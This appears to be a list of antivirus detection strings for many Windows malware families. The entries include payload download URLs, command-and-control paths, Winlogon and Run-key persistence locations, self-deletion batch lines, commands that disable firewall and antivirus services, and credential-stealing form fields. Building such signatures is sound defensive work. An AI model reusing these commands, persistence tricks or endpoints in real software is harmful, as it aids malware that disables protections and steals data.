- AMS.GPA_Academic_History_Look_Up.resources (PEHSTR_EXT)
- AMS.LogIn.resources (PEHSTR_EXT)
- AMS.Main_Menu.resources (PEHSTR_EXT)
- AMS.Resources.resources (PEHSTR_EXT)
- PaCman.AboutBox1.resources (PEHSTR_EXT)
- PaCman.Controller_MainForm.resources (PEHSTR_EXT)
- PaCman.Properties.Resources.resources (PEHSTR_EXT)
- PaCman.View.resources (PEHSTR_EXT)
- Factor.Factor.resources (PEHSTR_EXT)
- ArrangePicture.Form1.resources (PEHSTR_EXT)
- ITokenReader.frmITokenReader.resources (PEHSTR_EXT)
- ITokenReader.frmDestino.resources (PEHSTR_EXT)
- ITokenReader.frmPessoa.resources (PEHSTR_EXT)
- ITokenReader.frmPrincipal.resources (PEHSTR_EXT)
- ITokenReader.frmSobre.resources (PEHSTR_EXT)
- ITokenReader.frmTramitando.resources (PEHSTR_EXT)
- VehicleManager.ListView.resources (PEHSTR_EXT)
- VehicleManager.MainForm.resources (PEHSTR_EXT)
- ITokenReader.Properties.Resources.resources (PEHSTR_EXT)
- ITokenReader.Resources.resources (PEHSTR_EXT)
- VehicleManager.TypeControl.resources (PEHSTR_EXT)
- SYSTEM_BNHS.vb.Block64.resources (PEHSTR_EXT)
- BNHSCommand (PEHSTR_EXT)
- Agent.exe (PEHSTR_EXT)
- ConfuserEx v0.6.0 (PEHSTR_EXT)
- ISO2022Modes.Search.resources (PEHSTR_EXT)
- ISO2022Modes.crystal.resources (PEHSTR_EXT)
- ISO2022Modes.Kin.resources (PEHSTR_EXT)
- ISO2022Modes.frmMain.resources (PEHSTR_EXT)
- ISO2022Modes.AddInfo.resources (PEHSTR_EXT)
- ISO2022Modes.UpdateInfo.resources (PEHSTR_EXT)
- ISO2022Modes.Deleteinfo.resources (PEHSTR_EXT)
- ISO2022Modes.Properties.Resources.resources (PEHSTR_EXT)
- ISO2022Modes.product.resources (PEHSTR_EXT)
- ISO2022Modes.view.resources (PEHSTR_EXT)
- rkQuAtdP2v2DC8XaJSe (PEHSTR_EXT)
- SchoolManagementSystem.Properties (PEHSTR_EXT)
- 1ese92VWgsRJFT1srbgo5SFPIMk+jbLKTQ5ewNnKClI5csh6i5HItc6B40fr9wVIfYpUxb63Gvz4DGxgcD7qn2prJsnnb2tpZ+3zDqOUhcoTOoF0F7KDoLSLZDP3aQ5cAqh/bcGXWvQpfVDZoDC66W+BXEQw8VkWZAHPNKFE6WCHrFZSZRNnLmsFE (PEHSTR)
- ServerComputer (PEHSTR_EXT)
- System.Threading (PEHSTR_EXT)
- ParseXmlDescription (PEHSTR_EXT)
- SetCompatibleTextRenderingDefault (PEHSTR_EXT)
- System.Security.AccessControl (PEHSTR_EXT)
- commandLine (PEHSTR_EXT)
- System.Reflection (PEHSTR_EXT)
- System.Drawing (PEHSTR_EXT)
- System.Security.Principal (PEHSTR_EXT)
- System.Runtime.Remoting (PEHSTR_EXT)
- System.Reflection.Emit (PEHSTR_EXT)
- SoapName.dll (PEHSTR_EXT)
- SoapName.My.Resources (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- CrazyTetris.Form1.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel2.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel3.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel4.resources (PEHSTR_EXT)
- CrazyTetris.frmLevel5CHIMNEY.resources (PEHSTR_EXT)
- CrazyTetris.frmLevelSelect.resources (PEHSTR_EXT)
- CrazyTetris.frmMainMenu.resources (PEHSTR_EXT)
- CrazyTetris.frmSettings.resources (PEHSTR_EXT)
- CrazyTetris.GameForm.resources (PEHSTR_EXT)
- CrazyTetris.HighScoreForm.resources (PEHSTR_EXT)
- CrazyTetris.MainMenu.resources (PEHSTR_EXT)
- CrazyTetris.Resources.resources (PEHSTR_EXT)
- CrazyTetris.SplashScreen.resources (PEHSTR_EXT)
- \resources\Images\tut.png (PEHSTR_EXT)
- TankGame.StartUp.resources (PEHSTR_EXT)
- TankGame.Resources.resources (PEHSTR_EXT)
- TankGame.MultipleBlocks.resources (PEHSTR_EXT)
- TankGame.QuickStart.resources (PEHSTR_EXT)
- IEnumSTORECATEGORYINSTA.exe (PEHSTR_EXT)
- get_IsCompleted (PEHSTR_EXT)
- RecordBgySystem.Res_delete.resources (PEHSTR_EXT)
- public.class.Main.HelloWorld.module13 (PEHSTR_EXT)
- MKMNnN988.Properties.Resources.resources (PEHSTR_EXT)
- Chuang.Printer.ClientUninstall (PEHSTR_EXT)
- Delo2Mail.My.Resources (PEHSTR_EXT)
- Delo2Mail.Baidu (PEHSTR_EXT)
- ShellExecute (PEHSTR_EXT)
- kernel32.dll (PEHSTR_EXT)
- HotelMgmtSystem.Booking.resources (PEHSTR_EXT)
- HotelMgmtSystem.loginForm.resources (PEHSTR_EXT)
- HotelMgmtSystem.Properties.Resources.resources (PEHSTR_EXT)
- System.Drawing.Bitmap (PEHSTR_EXT)
- ComponentResourceManager (PEHSTR_EXT)
- KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator (PEHSTR_EXT)
- My.Settings (PEHSTR_EXT)
- Dispose__Instance__ My.MyWpfExtenstionModule.Windows (PEHSTR_EXT)
- FionnCharacterSheet.Welcome.resources (PEHSTR_EXT)
- FionnCharacterSheet.LCDEmulatorFrm.resources (PEHSTR_EXT)
- FionnCharacterSheet.Resources.resources (PEHSTR_EXT)
- FionnCharacterSheet.SkillsFocuses.resources (PEHSTR_EXT)
- FionnCharacterSheet.MultipleBlocks.resources (PEHSTR_EXT)
- http://DATABASE AQUI/ddos.txt (PEHSTR_EXT)
- http://DATABASE AQUI/geoip.txt (PEHSTR_EXT)
- http://DATABASE AQUI/sniffer.txt (PEHSTR_EXT)
- http://DATABASE AQUI/database.txt (PEHSTR_EXT)
- http://DATABASE AQUI/chat.txt (PEHSTR_EXT)
- http://DATABASE AQUI/project.txt (PEHSTR_EXT)
- HTTPService.exe (PEHSTR_EXT)
- cmd /c taskkill /f /t /im files\s-irecovery.exe (PEHSTR_EXT)
- http://ih8sn0w.com (PEHSTR_EXT)
- \files\llb.3gs.dfu (PEHSTR_EXT)
- iBooty.Resources.resources (PEHSTR_EXT)
- ms2mz.KeyWriter.resources (PEHSTR_EXT)
- get_UseCompatibleTextRendering (PEHSTR_EXT)
- broke_mobile.My.Resources (PEHSTR_EXT)
- set_UpdateCommand (PEHSTR_EXT)
- LoginScreen_Load (PEHSTR_EXT)
- CommitUrlCacheEntryW (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- get_net_http_content_buffersize_exceeded (PEHSTR_EXT)
- get_net_http_client_send_completed (PEHSTR_EXT)
- get_net_http_operation_started (PEHSTR_EXT)
- Lerlibro_INC.Se1.resources (PEHSTR_EXT)
- Lerlibro_INC.fnt1.resources (PEHSTR_EXT)
- Lerlibro_INC.frmHRPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmMISPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmAccountingPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmSalesPanel.resources (PEHSTR_EXT)
- Lerlibro_INC.frmMain.resources (PEHSTR_EXT)
- Lerlibro_INC.Resources.resources (PEHSTR_EXT)
- Lerlibro_INC.ucUsers.resources (PEHSTR_EXT)
- Lerlibro_INC.Baidu.resources (PEHSTR_EXT)
- 5.172.39.25/browser.php (PEHSTR_EXT)
- https://ostoja.tk/browser.php (PEHSTR_EXT)
- TOJA_Browser.Properties.Resources (PEHSTR_EXT)
- InvokeMethod.InvokeMethod (PEHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- CMS.Resources.resources (PEHSTR_EXT)
- CMS.Hett.resources (PEHSTR_EXT)
- LibraryManagementSystem.Resources.resources (PEHSTR_EXT)
- Studioborne.Resources (PEHSTR_EXT)
- ITypeComp (PEHSTR_EXT)
- Destinationd.Resources.resources (PEHSTR_EXT)
- Destinationd.Underlying.resources (PEHSTR_EXT)
- BestFitMappingAttribute.EnumeratorSimple (PEHSTR_EXT)
- Tienda.Resources (PEHSTR_EXT)
- http://w (PEHSTR)
- 5Software\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR)
- explorer.exe (PEHSTR)
- \regcheck (PEHSTR)
- /spambot (PEHSTR)
- a.bat (PEHSTR_EXT)
- file.php?&ID=%s&EXE= (PEHSTR_EXT)
- dalexcars.com (PEHSTR)
- GET /intercooler (PEHSTR)
- Host: www. (PEHSTR)
- 'User-Agent: Mozilla/4.0 (compatible; 1- (PEHSTR)
- /users/mulez/ (PEHSTR)
- %s\%s%d.exe (PEHSTR)
- Mozilla/4.0 (compatible) (PEHSTR_EXT)
- %s\%s (PEHSTR_EXT)
- http://max-stats.com (PEHSTR_EXT)
- http://sc-cash.com (PEHSTR_EXT)
- www.teen4-sex.com (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\pref (PEHSTR_EXT)
- c2.php?i= (PEHSTR_EXT)
- winlogon32. (PEHSTR_EXT)
- http://yupsearch.com (PEHSTR_EXT)
- /silent_install.exe (PEHSTR_EXT)
- /sideb.exe (PEHSTR_EXT)
- \%ld%d.exe (PEHSTR_EXT)
- http://toolbarpartner.com (PEHSTR_EXT)
- /installed.php?wm= (PEHSTR_EXT)
- /programs.txt (PEHSTR_EXT)
- http://sturfajtn.com (PEHSTR_EXT)
- /w.php (PEHSTR_EXT)
- /load.txt (PEHSTR_EXT)
- %WINDIR%\System32\$$$ (PEHSTR_EXT)
- regsvr32 /s (PEHSTR_EXT)
- %SystemRoot%\sys (PEHSTR_EXT)
- %i%i.dll (PEHSTR_EXT)
- %i%i.exe (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR_EXT)
- %WINDIR%\System32\ (PEHSTR_EXT)
- @del %0a.bat C:\myapp.exe (PEHSTR_EXT)
- TND1http://85.255.119 (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\origami (PEHSTR_EXT)
- wininet.dll (PEHSTR_EXT)
- psapi.dll (PEHSTR_EXT)
- ##ws2_32.dll (PEHSTR_EXT)
- ##%d.exe (PEHSTR_EXT)
- @@svchost.exe (PEHSTR_EXT)
- ##http://64.27.0.205 (PEHSTR_EXT)
- 216.255.189.85 (PEHSTR_EXT)
- w:\work\vcprj\prj\downloader\Release\injdldr.pdb (PEHSTR_EXT)
- http://64.27.0.205/up/calc2.bin (PEHSTR_EXT)
- %s\t%d.exe (PEHSTR_EXT)
- .?AVtype_info@@ (PEHSTR_EXT)
- NSAPI.dll (PEHSTR_EXT)
- HttpQueryInfoA (PEHSTR_EXT)
- icrosoft\Active Setup\Installed (PEHSTR)
- .SPIRIT (PEHSTR)
- shellexecute=RECYCLER\systems.com (PEHSTR_EXT)
- open=systems.com (PEHSTR_EXT)
- shellexecute=systems.com (PEHSTR_EXT)
- shell\start\command=systems.com (PEHSTR_EXT)
- shell\read\command=explorer.exe (PEHSTR_EXT)
- shell\start\command=RECYCLER\systems.com (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\system (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- taskmger.com (PEHSTR_EXT)
- \RECYCLER\systems.com (PEHSTR_EXT)
- \system32\taskmger.com (PEHSTR_EXT)
- \dllcache\svchost.exe (PEHSTR_EXT)
- C:\TestFiles\win.ini (PEHSTR_EXT)
- \system.bak (PEHSTR_EXT)
- \system.log (PEHSTR_EXT)
- \systhecatmsg.gif (PEHSTR_EXT)
- EXE (PEHSTR_EXT)
- \sysmsgprocess (PEHSTR_EXT)
- http://www.455465x.com/test/IP.asp (PEHSTR_EXT)
- QQ.exe (PEHSTR_EXT)
- \themsgmove.exe (PEHSTR_EXT)
- \autorun.in (PEHSTR_EXT)
- .x/txt.txt (PEHSTR_EXT)
- \mshntfy16.dat (PEHSTR_EXT)
- \mshd (PEHSTR_EXT)
- QSoftware\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR)
- %s\progmon.exe (PEHSTR)
- %s\internt.exe (PEHSTR)
- c:\sss.scr (PEHSTR)
- c:\sss1.scr (PEHSTR)
- c:\sss2.scr (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo1.exe (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo2.exe (PEHSTR)
- ,http://www.clubnoega.com/_notes/arquivo3.exe (PEHSTR)
- http://www.ip2location.com/ (PEHSTR_EXT)
- ShellExecuteExA (PEHSTR_EXT)
- comspec (PEHSTR_EXT)
- /c del " (PEHSTR_EXT)
- %sRundll32.exe "%s%s",DllCanUnloadNow (PEHSTR_EXT)
- RUNDLL32 "%s" Start (PEHSTR_EXT)
- tspop.sys (PEHSTR_EXT)
- tsbho.dll (PEHSTR_EXT)
- tspopdll.cab (PEHSTR_EXT)
- tspopsys.cab (PEHSTR_EXT)
- tsbho.cab (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\%s (PEHSTR_EXT)
- Wininet.dll (PEHSTR_EXT)
- |Options.InfectFiles= (PEHSTR)
- KeyLogger.Active (PEHSTR)
- |Options.DeactiveKasperSky= (PEHSTR)
- /Google_files/hp (PEHSTR_EXT)
- Software\Microsoft\new WWW\vars (PEHSTR_EXT)
- Software\Microsoft\WebServer Data (PEHSTR_EXT)
- /C net view >c:\nv (PEHSTR)
- :ExeDelete (PEHSTR)
- del %ExePath% (PEHSTR)
- !if exist %ExePath% goto ExeDelete (PEHSTR)
- del %BatPath% (PEHSTR)
- >http://g1.globo.com/Noticias/SaoPaulo/0,,MUL73439-5605,00.html (PEHSTR)
- c:\winupdte.exe (PEHSTR)
- +http://globonoticia.iitalia.com/noticia.com (PEHSTR)
- c:\temp.bat (PEHSTR)
- \ucleaner_setup.exe (PEHSTR)
- \s2f.exe (PEHSTR)
- \Casino.ico (PEHSTR)
- \Spyware Remover.ico (PEHSTR)
- /program/ (PEHSTR_EXT)
- a-zA-Z0-9._/-Setup.exe (PEHSTR_EXT)
- *http://nemesis.feed.parkingspa.com/Nemesis (PEHSTR)
- ;C:\Program Files\DomainSpa\Nemesis\Client\NemesisClient.exe (PEHSTR)
- %s\%s.exe (PEHSTR_EXT)
- %s\regsvr32.exe "%s" %s (PEHSTR_EXT)
- .co.kr/ (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\*.* (PEHSTR_EXT)
- <notepod.exe\shell\open\command (PEHSTR)
- C:\WINDOWS\SYSTEM32\rsvp.exe (PEHSTR)
- &"C:\WINDOWS\SYSTEM32\notepod.exe" "%1" (PEHSTR)
- @Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt (PEHSTR)
- http://www.jesuser.cn/plug/doSelect.asp?CMD=%s (PEHSTR_EXT)
- http://www.qqhudong.cn/usersetup.asp?action= (PEHSTR_EXT)
- \sv//ch//ost//.e//xe// (PEHSTR_EXT)
- common (PEHSTR_EXT)
- exec (PEHSTR_EXT)
- w\\dl\\l (PEHSTR_EXT)
- nexec (PEHSTR_EXT)
- /search?client= (PEHSTR_EXT)
- www.google.cn (PEHSTR_EXT)
- /search?q= (PEHSTR_EXT)
- /url?sa= (PEHSTR_EXT)
- ftp://ggss:xsw2xsw2@g (PEHSTR_EXT)
- .adfirefox.cn/g (PEHSTR_EXT)
- /gcon.dat (PEHSTR_EXT)
- /gkey.dat (PEHSTR_EXT)
- gcon.dat (PEHSTR_EXT)
- gkey.dat (PEHSTR_EXT)
- SOFTWARE\Microsoft\WAB\Export (PEHSTR_EXT)
- wininit. (PEHSTR_EXT)
- \usrinit.dll (PEHSTR_EXT)
- http://www.alxup.com/bin/Up.ini (PEHSTR_EXT)
- \UpAuto.ini (PEHSTR_EXT)
- AutoUp.exe (PEHSTR_EXT)
- CoMarshalInterThreadInterfaceInStream (PEHSTR_EXT)
- http://65.243.103. (PEHSTR_EXT)
- http://89.188.16. (PEHSTR_EXT)
- Software\Microsoft\MS Juan (PEHSTR_EXT)
- C:\WINDOWS\SYSTEM32\comm.xml (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer (PEHSTR_EXT)
- comm.php (PEHSTR_EXT)
- newuser.php (PEHSTR_EXT)
- Down.dll (PEHSTR_EXT)
- sploso.com (PEHSTR_EXT)
- hellExecuteA (PEHSTR_EXT)
- \file.exe (PEHSTR_EXT)
- http://www.comegoto.com/host.jpg (PEHSTR_EXT)
- delme.bat (PEHSTR_EXT)
- nonome.bat (PEHSTR_EXT)
- http://kokovs.cc/porno/stat.php (PEHSTR_EXT)
- Software\JavaSoft\Prefs (PEHSTR_EXT)
- logo.png (PEHSTR_EXT)
- http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9 (PEHSTR_EXT)
- http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read (PEHSTR_EXT)
- http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s (PEHSTR_EXT)
- %s\test_file1234.txt (PEHSTR_EXT)
- Software\LifeTimePorn (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
- "%s" /VERYSILENT (PEHSTR_EXT)
- /REGISTRYFIX.EXE (PEHSTR_EXT)
- c:\RPCInstall\Release\RPCInstall.pdb (PEHSTR_EXT)
- Install Service Success,Ready Execute Work Thread... (PEHSTR_EXT)
- No Find Service,Ready Install Service... (PEHSTR_EXT)
- No Find RedGirl Server,Installing... (PEHSTR_EXT)
- htmlfile\shell\open\command (PEHSTR_EXT)
- %s Inject To Browser... (PEHSTR_EXT)
- \tmp.bat (PEHSTR_EXT)
- /search.php?q=%s&adv=%d&id=%d&s=%d (PEHSTR_EXT)
- 10trustedsites.com (PEHSTR_EXT)
- top10searches.net (PEHSTR_EXT)
- top20searches.net (PEHSTR_EXT)
- Content-Type: text/html; charset=UTF-8 (PEHSTR_EXT)
- search.msn.com/results.aspx (PEHSTR_EXT)
- 360Safe.exe (PEHSTR_EXT)
- antiarp.exe (PEHSTR_EXT)
- \svchost.dll (PEHSTR_EXT)
- Global\IPRIP (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\IPRIP (PEHSTR_EXT)
- cmd.exe /c net start %s & del "%s" (PEHSTR_EXT)
- Applications\iexplore.exe\shell\open\command (PEHSTR_EXT)
- wordpad.exe (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- Hardware\Description\System\CentralProcessor\0 (PEHSTR_EXT)
- 360Tray.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\. (PEHSTR_EXT)
- /msword/search/ (PEHSTR_EXT)
- /exel/download/ (PEHSTR_EXT)
- /window/stop/ (PEHSTR_EXT)
- /pascal/find/ (PEHSTR_EXT)
- /xp/run/ (PEHSTR_EXT)
- VBScript (PEHSTR_EXT)
- 0/kills.txt?time= (PEHSTR_EXT)
- %d.%d.%d.%d (PEHSTR_EXT)
- Msxml2.DOMDocument (PEHSTR_EXT)
- /size.php (PEHSTR_EXT)
- HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Somefox (PEHSTR_EXT)
- Software\Microsoft\Windows NT\CurrentVersion\Windows (PEHSTR_EXT)
- http://hqsextube08.com/getsoft/task.php?v= (PEHSTR_EXT)
- \Adobe\Manager.exe (PEHSTR_EXT)
- \crc.dat (PEHSTR_EXT)
- Ie6PatchBar.exe (PEHSTR_EXT)
- Kb83830597TmpNew.exe (PEHSTR_EXT)
- down1.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Setup\{250D8FBA-AD11-11D023-98A823-08002423102} (PEHSTR_EXT)
- AppEvent.exe (PEHSTR_EXT)
- &RESSDT.exe (PEHSTR)
- \RESSDT.sys (PEHSTR)
- \sysave.exe (PEHSTR)
- Rcmd.exe /c echo ping 127.1 -n 4 >nul 2>nul >"C:\Program Files\sys.bat" & echo del (PEHSTR)
- xcmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled (PEHSTR)
- /stop McShield&net stop "Norton AntiVirus Server (PEHSTR)
- .C:\Program Files\Rising\AntiSpyware\ieprot.dll (PEHSTR)
- birdluck6.cn/root/sysupdate (PEHSTR)
- http://wmjqr.cn (PEHSTR_EXT)
- %s\syscheck.exe (PEHSTR_EXT)
- Internet Explorer\IEXPLORE.EXE" http://www.178gg.com/lianjie/ (PEHSTR_EXT)
- \fresh.exe (PEHSTR_EXT)
- taourl.com (PEHSTR_EXT)
- /UVVh (PEHSTR)
- &tytul=Tibissa.com&tresc=Nazwa%20konta: (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\System (PEHSTR_EXT)
- .gif%3E <br> ........ (PEHSTR_EXT)
- \ocsdebug.txt (PEHSTR_EXT)
- >Zobacz%20postac%20na%20Tibia.com<a>+<br>+<a%20href=https://secure.tibia.com/account/?subtopic=accountmanagement>Zaloguj%20sie%20na%20Tibia.com<a>+<br>+<a%20href=http://tibia.pl/earth.php?x= (PEHSTR_EXT)
- &tytul=Tibissa.com&tresc=Account%20name: (PEHSTR_EXT)
- <br><a%20href=http://www.tibia.com/community/?subtopic=characters%26name= (PEHSTR_EXT)
- .gif%3E<br>Identyfikator: (PEHSTR_EXT)
- vcltest3.dll (PEHSTR_EXT)
- >Informations%20from%20Tibia.com<a>+<br>+<a%20href=https://secure.tibia.com/account/?subtopic=accountmanagement>Login%20to%20Tibia.com<a>+<br>+<a%20href=http://tibia.pl/earth.php?x= (PEHSTR_EXT)
- \esentprf.ini (PEHSTR_EXT)
- sc.exe stop (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- http\shell\open\command (PEHSTR_EXT)
- %s.old (PEHSTR_EXT)
- msagent (PEHSTR_EXT)
- %s\%s\%s%s (PEHSTR_EXT)
- %s\dllcache\%s.sys (PEHSTR_EXT)
- ipfltdrv.sys (PEHSTR_EXT)
- cmd.exe /C ping.exe 127.0.0.1 & del " (PEHSTR_EXT)
- sc.exe start (PEHSTR_EXT)
- \WINDOWS\system32\regsvr32.exe (PEHSTR_EXT)
- 58.49.58.20 (PEHSTR_EXT)
- sc.exe description (PEHSTR_EXT)
- \WINDOWS\sc.exe (PEHSTR_EXT)
- -dbat" type= own type= interact start= auto DisplayName= (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- ' target='_blank'>test</a> (PEHSTR_EXT)
- C:\bootfont.biz (PEHSTR_EXT)
- #webpop.xpg.com.br/Configuracoes.ini (PEHSTR)
- netsh.exe (PEHSTR)
- vrsOkInt.php (PEHSTR)
- okinternet.co.kr (PEHSTR)
- HttpOpenRequestA (PEHSTR)
- system32\drivers\pcihdd.sys (PEHSTR)
- System32\Userinit.exe (PEHSTR)
- .mackt (PEHSTR)
- http://www.myfiledistribution.com/mfd.php (PEHSTR_EXT)
- IELite ver:0.0.0 (PEHSTR_EXT)
- st1.serveblog.net (PEHSTR)
- yllapa.no-ip.info (PEHSTR)
- az8.no-ip.info (PEHSTR)
- CONNECT %s:%i HTTP/1.0 (PEHSTR)
- (SOFTWARE\Classes\http\shell\open\command (PEHSTR)
- @SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- 4Software\Microsoft\Active Setup\Installed Components (PEHSTR)
- sc.exe start (PEHSTR_EXT)
- \drivers\ (PEHSTR_EXT)
- .com/kills.txt?t (PEHSTR_EXT)
- 122.224.9.151/kills.txt?t (PEHSTR_EXT)
- live. (PEHSTR_EXT)
- rds.yahoo. (PEHSTR_EXT)
- yahoo. (PEHSTR_EXT)
- google. (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer (PEHSTR_EXT)
- User-Agent: %s (PEHSTR_EXT)
- CLSID\e405.e405mgr (PEHSTR_EXT)
- ASoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (PEHSTR)
- text/htm (PEHSTR)
- %s\%s (PEHSTR)
- Software\Microsoft\Internet Explorer (PEHSTR)
- Software\Mozilla\Mozilla Firefox (PEHSTR)
- Control Panel\International (PEHSTR)
- Cmd= (PEHSTR_EXT)
- www.yahoo.com/ (PEHSTR_EXT)
- www.google.com/ (PEHSTR_EXT)
- winhlp32.exe (PEHSTR_EXT)
- Settings\User Agent\Post Platform (PEHSTR_EXT)
- Click here to install latest antispyware tool. (PEHSTR_EXT)
- build for Trojan.exe Version (PEHSTR)
- <windir>\avshld.exe (PEHSTR)
- \Software\Internet Explorer\ (PEHSTR)
- <windir>\nvp.exe (PEHSTR)
- <windir>\avupdt.exe (PEHSTR)
- 7\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ (PEHSTR)
- "\shell\open\command\ (PEHSTR)
- " execute (PEHSTR)
- http://vidquick.info/cgi/ (PEHSTR_EXT)
- Error! Can't initialize plug-ins directory. Please try again later. (PEHSTR_EXT)
- \inetc.dll (PEHSTR_EXT)
- \ExecPri.dll (PEHSTR_EXT)
- trojdie.kxp,assistse.exe,rfw.exe,kavpfw.exe,kpfwsvc.exe,kavstart.exe,kwatch.exe,kavplus.exe (PEHSTR)
- mir.exe,mir.dat (PEHSTR)
- Content-Type: application/x-www-form-urlencoded (PEHSTR)
- HTTP/1.0 (PEHSTR)
- 200 %s=%s=%s/%s=%s=%s/%s=%s (PEHSTR)
- wav\Log-in-long2.wav (PEHSTR)
- wvwww.gamenete.com (PEHSTR)
- look/login.asp (PEHSTR)
- /look/pip.asp (PEHSTR)
- 950 1.50 (PEHSTR)
- SOFTWARE\wSkysoft (PEHSTR)
- http:// (PEHSTR)
- C:\Program Files\sys.bat (PEHSTR_EXT)
- 0C:\Documents and Settings\All Users\zhqbdf16.ini (PEHSTR)
- ?Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run (PEHSTR)
- dfzhqb.exe (PEHSTR)
- Fhttp://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d (PEHSTR)
- asdfjkluiop.com (PEHSTR)
- sweepstakess.com (PEHSTR)
- hotxxxtv.com (PEHSTR)
- freeporntoday.net (PEHSTR)
- freepornnow.net (PEHSTR)
- porn1.org (PEHSTR)
- www.c0rrupted.com (PEHSTR_EXT)
- C:\WINDOWS\system32\imglog.exe (PEHSTR_EXT)
- http://bot.cjfeeds.com (PEHSTR_EXT)
- WARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- c:\log.htm (PEHSTR_EXT)
- C:\pstorage.exe (PEHSTR_EXT)
- C:\userquota.exe (PEHSTR_EXT)
- @upload.php (PEHSTR_EXT)
- www.haoads.cn (PEHSTR)
- chuangzaohuihuang.cn (PEHSTR)
- micr0s0fts.cn (PEHSTR)
- http://unstat.baidu.com (PEHSTR)
- http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77 (PEHSTR_EXT)
- windows\a.txt (PEHSTR_EXT)
- http://update.xiaoshoupeixun.com/tsbho.ini (PEHSTR_EXT)
- update.microsoft.com (PEHSTR_EXT)
- ksinne.com/bs30.php (PEHSTR_EXT)
- "system.exe" (PEHSTR_EXT)
- http://fishhappy888.gicp.net/pe.exe (PEHSTR_EXT)
- http://happytigeryear.3322.org/pe.exe (PEHSTR_EXT)
- shell\explore\Command=system.exe (PEHSTR_EXT)
- \Autorun.inf (PEHSTR_EXT)
- http://stat.wamme.cn/C8C/gl/cnzz60.html (PEHSTR_EXT)
- system32\drivers\etc\service2.ini (PEHSTR_EXT)
- http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp (PEHSTR_EXT)
- kwstray.exe (PEHSTR_EXT)
- http://www.3322.org/dyndns/getip (PEHSTR_EXT)
- http://127.0.0.1/down/list2.txt (PEHSTR_EXT)
- \NSISdl.dll (PEHSTR_EXT)
- http://psvstats.info/hrtbbn/rwvski.exe (PEHSTR_EXT)
- Runtime VB5 OK. (PEHSTR_EXT)
- \Dialer.dll (PEHSTR_EXT)
- .c:\tmpz\boot.cmd (PEHSTR)
- del /Q /F c:\tmpz\boot.cmd (PEHSTR)
- @c:\ps.cmd (PEHSTR)
- del /Q /F %s (PEHSTR)
- del /Q /F c:\ps.cmd (PEHSTR)
- c:\ntldrxds (PEHSTR)
- 127.0.0.1 updates.symantec.com (PEHSTR)
- %s&ip=%s&mode=%s&dll=%d (PEHSTR_EXT)
- csrss%s.dll (PEHSTR_EXT)
- User-Agent: Mozilla Compatible Ppc Linker (PEHSTR_EXT)
- M:\flash\other\C++\LiteLoader 1.1\Release\ftpplug (PEHSTR_EXT)
- ftpplug2.dll (PEHSTR_EXT)
- User-Agent: Opera/ (PEHSTR_EXT)
- resto/ (PEHSTR_EXT)
- Referer: http://vkontakte.ru/login.php? (PEHSTR_EXT)
- setup.exe (PEHSTR)
- QyuleInstall.exe (PEHSTR)
- !http://update.qyule.com/setup.exe (PEHSTR)
- http://218.204.253.145/setup.exe (PEHSTR)
- 200.206.97.42 (PEHSTR)
- ACTIVX.exe (PEHSTR)
- http://upload.exe (PEHSTR)
- \msjava32\%s.key (PEHSTR)
- C:\windows\xxxzzzyyy.exe (PEHSTR)
- \mf*.dlld (PEHSTR)
- \winaccestor.datd (PEHSTR)
- ,CLSID\{A8981DB9-B2B3-47D7-A890-9C9D9F4C5552} (PEHSTR)
- regsvr32 /s (PEHSTR)
- Software\Privacy Project (PEHSTR)
- 192.168.0.102 (PEHSTR)
- 208.66.194.215 (PEHSTR)
- http://%s/Mail/%s (PEHSTR)
- &javascript:onSubmitToolbarItemClicked( (PEHSTR)
